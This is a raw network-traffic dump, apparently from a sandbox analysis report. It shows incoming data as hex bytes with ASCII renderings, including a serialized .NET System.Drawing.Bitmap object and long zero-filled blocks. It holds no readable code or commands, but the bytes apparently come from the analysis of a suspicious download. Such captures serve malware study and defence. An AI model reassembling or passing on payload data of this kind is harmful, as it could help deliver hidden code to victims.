2021-10-16 14:53:39 UTC	4929	IN	Data Raw: 8d c8 47 16 1a 2e 69 b7 92 1c a5 c8 75 bb e5 16 9f 9e 4b 82 59 48 7e ad ed ac 33 16 03 e7 30 4e 04 9f 61 1b e7 72 70 69 56 35 06 ca 84 0a 3a 99 df 80 0d bd e4 eb a5 11 25 97 c4 1e 2a 6e 7f e2 e9 9e 34 65 62 b8 c3 72 21 83 d2 6e 64 91 40 b1 9d c9 ca 08 66 ec d7 56 57 ea 87 86 7d 00 a2 fc de 2c 1b d7 93 92 c2 53 3c f9 c3 56 63 68 31 a5 79 2d 18 cf 5e 18 12 0f a6 d1 f9 1f 0a 31 46 74 db 98 fe 27 4b f2 18 ae fc 0b c1 16 e7 11 94 f3 2b 06 4b 21 c9 67 44 8b 00 57 91 b9 f2 68 0e cd 81 c8 b8 47 fa f8 44 ca 11 9b 74 fa 17 56 39 33 16 06 95 ad d3 7c da 3c 4f fb 98 49 71 65 8e 36 4c 48 47 d3 26 9b 86 bb ce d7 b4 6a 75 28 8e 36 7f e8 7a c3 24 d8 d3 07 79 6e e4 16 2d 0b 46 e0 07 f5 35 dd 77 54 a6 2b f6 6a 69 d3 5b 15 12 1a 57 aa 57 f0 09 26 0f 1d 60 fe ea cc 12 49 8f Data Ascii: G.iuKYH~30NarpiV5:%*n4ebr!nd@fVW},S<Vch1y-^1Ft'K+K!gDWhGDtV93\|<OIqe6LHG&ju(6z$yn-F5wT+ji[WW&`I
2021-10-16 14:53:39 UTC	4945	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 d9 f2 c3 49 ea f2 6c ab 70 aa 2b 68 72 d7 45 bd ed 81 0e 8e 5d 76 c6 96 66 57 ea 8b 54 8f 08 14 1e a3 69 4c 08 5f a1 75 20 55 d5 6a f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Ilp+hrE]vfWTiL_u Uj
2021-10-16 14:53:39 UTC	4961	IN	Data Raw: 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4977	IN	Data Raw: 53 e7 4d a9 85 ae 88 6e e6 ea cb 68 e5 42 3d 95 dc 49 05 57 20 cc 33 93 55 25 4e c7 e8 2b f1 e0 82 af d1 b7 4f 64 5f 79 b9 72 bc ad 20 0b 79 9a 75 27 46 f9 79 8c 95 b4 eb 29 8e 3a ef 5e 4b 74 62 d1 08 81 ab 8b a4 e1 89 e0 10 83 d7 a8 c6 71 e2 42 be f4 3b 3b e4 6b 39 33 6c ca 21 d6 e3 b5 06 65 2b 51 ec 91 de 8a 0b 50 a9 6d c8 75 88 b9 e0 df d5 43 ee b4 92 6c eb 6f 6a e9 bf 12 35 8a af 0c 5b c6 c7 f1 7e 34 bf d8 dc 88 6d 4f 69 de 6f 50 e2 37 9d 36 c2 de 8d d8 30 16 6c ec 00 bc e1 d3 65 18 b9 d3 d5 35 b1 82 8e 44 1c ac b5 c0 ba c9 07 9d b7 ae 01 5d a2 65 74 d3 d6 b0 15 3b da db 09 95 84 ac 8e 2a 4b 8f ec e1 ab db 6b 85 f3 69 8f 59 68 be 39 4e 7f 24 74 ed b5 1d 8c 81 59 5b ca bb 54 ce f8 bd 6c f8 12 74 79 8e 32 02 a4 06 97 3b b4 ad e9 b2 78 7d e4 3a fe a1 ef Data Ascii: SMnhB=IW 3U%N+Od_yr yu'Fy):^KtbqB;;k93l!e+QPmuCloj5[~4mOioP760le5D]et;*KkiYh9N$tY[Tlty2;x}:
2021-10-16 14:53:39 UTC	4989	IN	Data Raw: 38 50 94 33 a0 ec 74 14 bb 5d 89 0e f6 c4 e8 1c 16 2c 09 72 5f d5 51 4e 45 c2 ba e2 3f 1a d1 a3 47 e9 4a 86 23 c3 58 7a ca 09 d1 f9 3b 5f 5f b4 6c 77 28 b8 b9 82 e1 3c 8a ea 21 29 ef 3c 0e f4 99 78 76 ef 25 e5 94 44 7a c8 28 4b 93 9c 29 fe 09 8b 4d f7 fe af bb 3e 95 c6 51 ad 79 22 e9 be 2b ea b1 3f ad 6b 9c c4 9d 9f 1e 79 c0 fd e9 3a 44 b9 44 ed 3f 93 c4 7c 61 7d 7a 79 68 c4 81 63 f7 6e b7 05 bc 97 0d b8 da 17 71 f6 f0 76 d2 e8 57 42 c1 31 04 58 97 df be 70 9a f3 ec c4 7d ee 59 c1 a9 6c d6 dc 8f 06 95 a9 7d bc 0d 21 86 59 71 e4 9b 93 a1 d6 8a 48 d2 2d 94 9d d5 45 26 45 85 a8 e0 43 c2 69 41 9c 58 83 16 8f ba 79 12 e9 39 7c c1 e5 73 09 11 c6 0f 1d 5c 17 8c d7 db 6b bb 64 71 8c c0 c3 86 91 8c c3 d2 99 fe 82 38 6c aa cb 19 d1 f9 f4 d2 61 4b a8 0a 22 72 16 47 Data Ascii: 8P3t],r_QNE?GJ#Xz;__lw(<!)<xv%Dz(K)M>Qy"+?ky:DD?\|a}zyhcnqvWB1Xp}Yl}!YqH-E&ECiAXy9\|s\kdq8laK"rG
2021-10-16 14:53:39 UTC	5005	IN	Data Raw: 31 a1 e9 b6 e5 ab b0 e6 2c 9d 81 81 4c 36 41 ad 58 42 e0 69 5e bb 78 43 57 cd 8c bf 0b dc 22 81 b9 9e 26 41 41 a3 37 86 12 f9 c5 de c9 d6 4f b9 a2 1e cd 8e cd 07 de 9f 9e ba 14 27 86 29 32 73 ca 3e fe 0e 6a fc 4c 62 9c 8b 8a 9e ea 81 dd 88 9f a8 c3 76 af 43 c5 23 ba 0e b0 cc 80 ad 6b 95 be 04 bd 61 b6 49 e9 c1 a4 33 cf cc 76 ed f0 79 9f f6 c7 cb 5c 83 68 5c 43 a2 12 f3 c1 0e b4 ee 29 68 69 e5 5b 19 7d 72 16 a6 a2 1c 91 07 90 f1 d2 79 a3 cc 0e cf c1 7d 9f 9e fb 24 29 89 ac aa fd 8b 0f 9e 28 e3 20 32 95 5c 34 76 b6 72 03 8c 3e b0 c0 2c 1a f8 b2 42 3c 15 e9 55 30 98 59 f3 cc 15 d3 24 5a 46 59 94 37 84 e6 1d f4 84 05 6d 3f 40 44 c6 3f 36 6a 28 1f aa 42 87 30 6c b1 57 1b 06 bc 72 54 d2 75 4b a1 3a dc 70 2b 94 6e 3f a8 af ad 7d 8e c2 26 dd 61 15 c6 a1 e1 14 4f Data Ascii: 1,L6AXBi^xCW"&AA7O')2s>jLbvC#kaI3vy\h\C)hi[}ry}$)( 2\4vr>,B<U0Y$ZFY7m?@D?6j(B0lWrTuK:p+n?}&aO
2021-10-16 14:53:39 UTC	5021	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	5037	IN	Data Raw: cb 13 8a 28 d0 af 2d 20 27 c0 c7 bd 1f b6 fb 0b 54 9b da 35 6b f8 08 ba 57 26 a5 c3 0d f1 7c ee 80 42 30 50 90 97 a0 a1 f1 a1 05 db 7f 7e ba 1e 2c a7 8b 26 aa a3 e4 f8 aa f8 11 ec 05 79 9d b9 d2 f4 75 04 af 2b dd 3d ca 94 d5 21 7a d1 c2 ca ce 1d 87 e6 e1 2d 0f 35 a5 bc aa 73 9c 56 ad 44 51 cf 1d 30 7d a0 99 c2 d0 9a 94 a7 35 0f 17 2c 77 d9 53 a9 2e f6 58 9c 39 68 f8 e1 58 4c fd 0c 1e 24 a5 a3 ca 36 4f c1 ce 89 5e 94 80 1b 86 39 fa 46 cc 4a 31 de 05 7a 0f 78 01 dc a2 16 01 23 0d 01 05 19 0b 1b e4 0d 0f 00 00 00 00 c3 c4 96 10 23 17 c0 40 41 e6 db fc 84 c1 46 0d 78 3e 8e bf ed 43 5a 94 eb a5 05 34 d1 1b 34 4c c9 43 80 cf a5 03 98 f3 7a 0d 96 1c 90 f0 77 63 f9 1d 0b 70 43 c9 a3 3e 10 dc a9 a2 9e 91 58 42 3f 22 a3 39 9c 75 a2 c8 6c 7a 6d 65 c7 ae 3e 24 47 5d Data Ascii: (- 'T5kW&\|B0P~,&yu+=!z-5sVDQ0}5,wS.X9hXL$6O^9FJ1zx##@AFx>CZ44LCzwcpC>XB?"9ulzme>$G]
2021-10-16 14:53:40 UTC	5053	IN	Data Raw: 6c 3b 32 07 11 6d 86 0a 81 5c 43 49 1f 08 1b 08 37 74 ba 7e 2e d3 20 00 aa 4b 2f a5 7a e6 e4 eb e6 f0 38 54 26 7e 3d fb 87 82 65 47 09 48 53 25 17 fd 83 58 d9 f6 b4 3f 80 a9 58 56 3e e2 01 72 ee e3 6c ef 87 af c9 e5 c3 6d 2b c6 48 05 aa 88 1b 3b fa 4f e3 df 49 ed f1 24 07 92 fd 00 6f 0a 49 1c cf c7 8d a5 a0 8b 0a 94 34 b3 a2 84 a4 61 18 2b 02 df 20 58 98 a6 23 32 57 0b c3 e4 fd cc e3 9b a6 66 52 a6 c7 07 cf 9a a0 71 fd ab 66 f5 1e 6d 03 92 d7 67 c1 c0 20 d2 3e b0 a6 40 55 58 a0 f3 45 7e 2d 8d 5e ff 2d d9 7c b6 54 da a6 b3 42 a3 83 a5 b0 55 f0 04 ee 98 b5 39 5c db e2 fc 4d d1 30 f3 1b 1a fd 11 bf 5c fe 09 13 1a a5 29 29 86 91 3c 92 61 9c 5a ec 66 4e 90 4b 3c 51 e7 fa 3f fc 55 e3 94 2d 99 94 26 28 76 39 0e 83 68 af 57 8e 1e a3 8e cf 59 a7 18 a8 03 19 6f 39 Data Ascii: l;2m\CI7t~. K/z8T&~=eGHS%X?XV>rlm+H;OI$oI4a+ X#2WfRqfmg >@UXE~-^-\|TBU9\M0\))<aZfNK<Q?U-&(v9hWYo9
2021-10-16 14:53:40 UTC	5069	IN	Data Raw: 53 4c 73 e7 03 6b 92 19 10 0f 8d 36 0a 61 23 e4 58 d9 21 39 77 4e 60 69 88 0e 31 df 37 c4 7a a1 5e 50 2e 68 14 e5 9c 29 a7 59 c7 5b d0 65 e5 ea a4 f5 1e 88 04 95 c3 53 5f dc 04 0f cf 2d ea bf cb 4c 7a a5 6f 3c f2 20 e3 6c 24 47 66 5f a2 7d 14 a1 67 eb 73 2c c0 41 dd bb c5 7b 44 d9 af 00 a8 04 c5 f0 2c 43 a7 fd 59 5e 9a 71 46 95 c2 c8 84 03 e2 4f da f6 f5 8d e0 2e bd 52 2b b3 8e 35 aa 39 db ff 2e 60 32 18 8e 24 3f ff f2 b8 fe 87 43 1d 7a 97 ab fe 46 d3 dc d6 2d 87 c4 d1 8f 3d e5 03 f6 ea e7 c4 45 31 26 aa cc 75 2b 2b 1d d4 73 b7 af 2c d1 9b 8b 4d e8 f1 57 74 83 1b 3f 85 f6 2f 31 5f e4 26 2c 42 9d 9c 00 eb 10 fe 32 fd 2a 72 1c e5 1f 6c b5 fb 69 27 30 9c 1c b8 d4 f6 60 b6 8b 14 01 4e 47 71 b6 e5 04 e0 36 89 8d d5 24 d3 aa c5 dc bc 1e 22 0b 41 cc b9 41 e4 68 Data Ascii: SLsk6a#X!9wN`i17z^P.h)Y[eS_-Lzo< l$Gf_}gs,A{D,CY^qFO.R+59.`2$?CzF-=E1&u++s,MWt?/1_&,B2*rli'0`NGq6$"AAh
2021-10-16 14:53:40 UTC	5085	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5101	IN	Data Raw: 6c 77 86 43 09 c8 f6 58 3c 02 5c 63 91 37 02 82 65 d5 93 43 07 97 43 3a ae b4 48 6d e9 7e a4 8e de 62 16 5c 2f ff 86 ea 04 fe 2d 86 24 ff 6b ca 7c 90 98 93 94 68 d7 68 07 1a d5 bb e0 61 fe 81 9f 6d db 4b 83 5c 96 82 f5 b8 44 2a ec ed 2f 84 c9 24 3a 78 2a ef 33 58 e2 89 31 f2 6a 4b 92 4a 49 23 c7 f5 c9 a8 b8 4e 3b 62 62 2b 55 7c cf ed 05 06 cd 94 90 7e 77 90 b9 62 53 bb 13 41 b3 be 7f 0d 16 df 57 7b 32 fc cf 92 5c 9b 63 64 53 e5 ff 4f 1e 6e 36 5a 28 eb 8b 4c 29 34 c2 1d 5b 17 0b 39 db 14 3a b9 34 60 9b 88 0c 65 10 3c 84 ee d4 cf 09 ec 0e ac e5 e8 93 35 96 45 a5 17 36 60 fc fd 74 18 d4 de 6a 9c 3e dd 22 58 05 1c 9c 71 89 e0 0d dd 9c 15 2b 37 9c ab c2 40 ca 08 68 78 7c 97 16 92 23 ee f7 72 5e 19 e7 d1 00 ec e0 fe 2a bc 78 3e 04 08 5f 33 08 e5 c6 05 9b 50 e8 Data Ascii: lwCX<\c7eCC:Hm~b\/-$k\|hhamK\D/$:x3X1jKJI#N;bb+U\|~wbSAW{2\cdSOn6Z(L)4[9:4`e<5E6`tj>"Xq+7@hx\|#r^*x>_3P
2021-10-16 14:53:40 UTC	5117	IN	Data Raw: 41 e2 e1 bc 2e 0f 12 b7 4c 26 d6 47 ff f2 c3 2f ea df f6 13 d4 32 6a df 86 7e b0 83 c9 ef 66 0f f2 fe f1 09 5e f4 ad 84 0f 57 6e ab f4 3d d2 43 f1 10 6c f3 57 78 00 11 1f 43 4f cb 5e 8f f3 72 cd 13 0b 08 43 3d 8d bc f8 a3 35 0c 1e 03 51 4d dc 2b 65 76 1a 1f 28 77 4e 69 10 23 30 44 4c 2c a5 64 3c ca 76 b5 67 a1 d9 e1 d0 8c b0 f7 96 51 2b 25 0d f4 88 cc 73 bb a9 a7 7f c5 1e 63 27 2d fa b4 e5 6d ae 1c 8d 32 a7 b6 31 56 3f 68 f3 35 a1 0e 8a 1c 29 7a 45 35 ce a0 87 aa c8 be 16 23 11 cf 02 f9 12 4d bd 86 a3 2b 22 f6 81 76 85 a3 0f a0 cf 68 77 22 ed e9 e8 d4 c6 69 ef dd 39 db ae 91 79 9b 1a 0d 7a 30 0b 4a 52 f1 b5 4c 70 fc 1b 02 71 d0 d3 fc 11 45 ae 1f 69 f0 f4 dd fb d1 94 db 22 a3 4d 90 8e 87 b0 5b 15 1a 72 13 dd c6 37 e2 1e 1d 01 ab 43 39 6e e6 ce 0f 18 31 cd Data Ascii: A.L&G/2j~f^Wn=ClWxCO^rC=5QM+ev(wNi#0DL,d<vgQ+%sc'-m21V?h5)zE5#M+"vhw"i9yz0JRLpqEi"M[r7C9n1
2021-10-16 14:53:40 UTC	5133	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5149	IN	Data Raw: 10 2c 65 8f ca 5e 29 93 eb d4 ad a1 0e 99 a3 cc 3a 49 d2 26 28 2a d3 f5 4d ef 40 8a e1 9b dd 2a 79 d2 47 80 06 d7 21 3b a6 c7 39 4f 89 18 81 1b 83 4f 56 7a 7d 79 58 ee e6 97 83 6f c2 e1 7f 54 f2 67 d6 bb 91 7e 85 1b 72 21 54 07 61 04 94 c3 bc a1 89 8a ea 12 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 Data Ascii: ,e^):I&(M@yG!;9OOVz}yXoTg~r!Ta@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM
2021-10-16 14:53:40 UTC	5165	IN	Data Raw: 6f bb 44 fc ac f0 5c a1 55 92 53 52 0d 68 1f 4a 5c 99 2a 79 37 0d 04 af fe 3d 4b e2 a2 f0 38 51 d9 13 3a 3b eb dd f0 5e cc c5 ce 68 60 91 d5 cb d4 97 b0 31 97 96 68 3e 11 8f 01 6d 47 e1 6f fc 61 1c e5 95 a3 43 2d a6 9e fd 61 a0 73 c8 0d 87 51 95 43 a8 4d 83 80 29 b6 95 3b 93 e6 6f 7c 1a 88 2d b9 ab 5e c7 03 9c af 21 82 23 6a 03 e5 22 3d e7 c4 e4 9c 5a 0f 7a cb 3e 58 aa 5e d3 22 4c 2a 97 b7 0b 07 f9 04 42 85 3c 74 24 e3 39 0c e1 5a 18 8e 5a 81 f4 b9 ef 7a 95 f3 b3 41 0d b0 a2 56 53 96 ef a6 ad 1d c0 55 cb 6a 8c da 70 52 87 fb 08 d2 e2 c8 4d ed e4 c2 55 70 ba 8f 61 86 85 70 8d 9a 37 9a 33 6e da 6b 36 d3 19 15 d0 2e 3b d3 d2 ee c9 1e cb 9b 71 6d a9 68 2a 5b 77 1e b3 95 45 23 f8 ef b8 03 64 be df 04 d8 86 67 8d c1 e8 59 05 24 ad ec 9e cc 0c 3b d4 45 97 b3 58 Data Ascii: oD\USRhJ\y7=K8Q:;^h`1h>mGoaC-asQCM);o\|-^!#j"=Zz>X^"LB<t$9ZZzAVSUjpRMUpap73nk6.;qmh*[wE#dgY$;EX
2021-10-16 14:53:40 UTC	5181	IN	Data Raw: 87 78 3a 4a e8 61 89 16 7a 83 89 1a 69 a0 5f ed 62 5e a7 e3 07 20 d0 91 3c 7f ce 40 14 ce f2 4e 3b f5 c2 17 9b 9d d0 a4 64 53 6a ac 95 26 51 b9 32 80 51 fa 5e 78 77 c8 ab 8d 4a 99 23 9b e3 3f 38 ec 12 12 5a ba 97 e1 90 1d 0a a3 d1 70 4b 76 06 27 44 e4 ca c8 c9 09 7a 45 77 6c f6 c2 d4 d9 9b b2 fb 5e 32 b9 0e cd c3 23 1f 4f 9b 0d 10 6a a6 c0 1b a6 5a a5 73 36 72 f9 77 c5 e7 f1 c5 37 72 3d 45 0f a7 5a b1 de bb b1 d8 cd a0 2a 17 30 98 b7 03 03 49 78 e8 a3 4c 76 8b dd 71 e7 e8 2e 83 7f df 1d 70 71 6e f6 7b 36 40 67 d6 3f f8 29 46 33 19 c6 81 9b 56 8d 1a 8d ef bb 8b 22 ff 10 3c db af ab 4a d0 58 17 75 c6 c2 65 79 55 a1 b0 03 11 c3 3c 1c 84 61 5e 72 c8 81 ae e1 62 86 7b 37 6b f4 d4 f8 c0 85 b3 f9 f2 b0 a5 e1 8f 4e 49 f9 5a ec ca af cc ad 40 39 e1 10 6c 2d 4a 34 Data Ascii: x:Jazi_b^ <@N;dSj&Q2Q^xwJ#?8ZpKv'DzEwl^2#OjZs6rw7r=EZ*0IxLvq.pqn{6@g?)F3V"<JXueyU<a^rb{7kNIZ@9l-J4
2021-10-16 14:53:40 UTC	5197	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5213	IN	Data Raw: f1 0d fa a2 0d 7a 0f 79 bc c6 08 84 f9 b9 27 90 e5 27 02 3e 37 b1 df 0e aa cf 6d 9c 41 62 49 ee a8 9e 2a c7 98 5b 63 ac 33 16 b5 44 9e 1a bb 49 68 aa 45 9b aa 62 5c 12 00 ac be f8 55 93 41 9e ec 09 2b 89 ce ad d7 d3 90 c8 e7 c2 58 bd d2 f6 40 80 c4 f2 22 51 63 12 ed 43 f6 60 72 5d 34 e6 7b 8b 3a 8e 92 a6 7b a5 52 cd 86 44 32 05 c5 25 fe e7 ed fd 8d be bd c4 15 83 07 cc 7a 88 34 53 65 fe 82 41 83 7b 65 41 6e 1c f3 38 59 5a 7d e7 61 62 36 c6 c6 ee 3a 6e 74 04 a4 30 f9 ba 4a 33 62 30 ff 40 66 a8 48 f9 c7 38 fd 90 d2 a4 5e 04 82 b4 41 c5 91 ce 02 87 0b 3c 76 a9 32 a4 2a 36 31 b9 22 b4 be be 7d 73 40 8d ae cd 0e a4 c0 a7 ab e1 9c 30 ef 47 85 2a af f2 73 e4 b0 9e 65 60 e4 f1 91 f5 46 54 3f 80 3a 65 5e 39 f2 63 73 de ca f9 5c f5 0a 06 b6 8f 77 a6 6b 41 f6 0b de Data Ascii: zy''>7mAbI[c3DIhEb\UA+X@"QcC`r]4{:{RD2%z4SeA{eAn8YZ}ab6:nt0J3b0@fH8^A<v261"}s@0G*se`FT?:e^9cs\wkA
2021-10-16 14:53:40 UTC	5229	IN	Data Raw: 86 d5 c8 2f 63 f5 37 20 d5 12 0d 84 53 13 69 f2 38 40 90 9e 74 bf f8 bb 5e 5a 1c d0 02 62 46 bc e0 90 53 d2 16 07 98 74 ab 2c 75 ef 5f a5 5b c7 8d cb e6 1d 54 a2 12 35 ad 34 88 d8 65 50 c1 5e cd df f0 98 ab 0f af 3d e3 01 d2 60 06 3f b9 54 a5 17 0b 39 23 7e 11 89 29 2b fa dc 51 b3 a4 23 89 1d b8 e0 0c d1 bc 98 43 f9 03 40 51 96 df f5 35 32 ed cb 45 90 71 a9 af 5e ef ee b9 84 ba 09 a3 45 24 70 40 2d b3 06 3f e0 22 3e 69 36 da dc 21 bb 79 64 20 8c 2e 6c 0b cb 94 de 1f 70 21 8b f8 fd 0d eb 98 29 10 cd 15 73 06 d7 6b ac 0a aa 50 e3 d1 bb 97 5d 1f fb 6f b1 dd 91 94 fc a6 f2 da 5b 3c 58 77 50 7b 11 52 df 29 e6 ac 34 56 1d 85 78 c0 b5 79 d8 e1 65 a1 df 00 aa 0c 1b a5 45 b2 cc 76 30 6b e4 60 9c b5 68 e6 7b 22 a1 ec f8 9d df a4 f3 88 07 a3 dd 82 4f f8 0d 41 53 49 Data Ascii: /c7 Si8@t^ZbFSt,u_[T54eP^=`?T9#~)+Q#C@Q52Eq^E$p@-?">i6!yd .lp!)skP]o[<XwP{R)4VxyeEv0k`h{"OASI
2021-10-16 14:53:40 UTC	5245	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 1f 6a 33 da 7e 60 cd Data Ascii: j3~`
2021-10-16 14:53:40 UTC	5261	IN	Data Raw: 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: BitmapDataBM6(,,
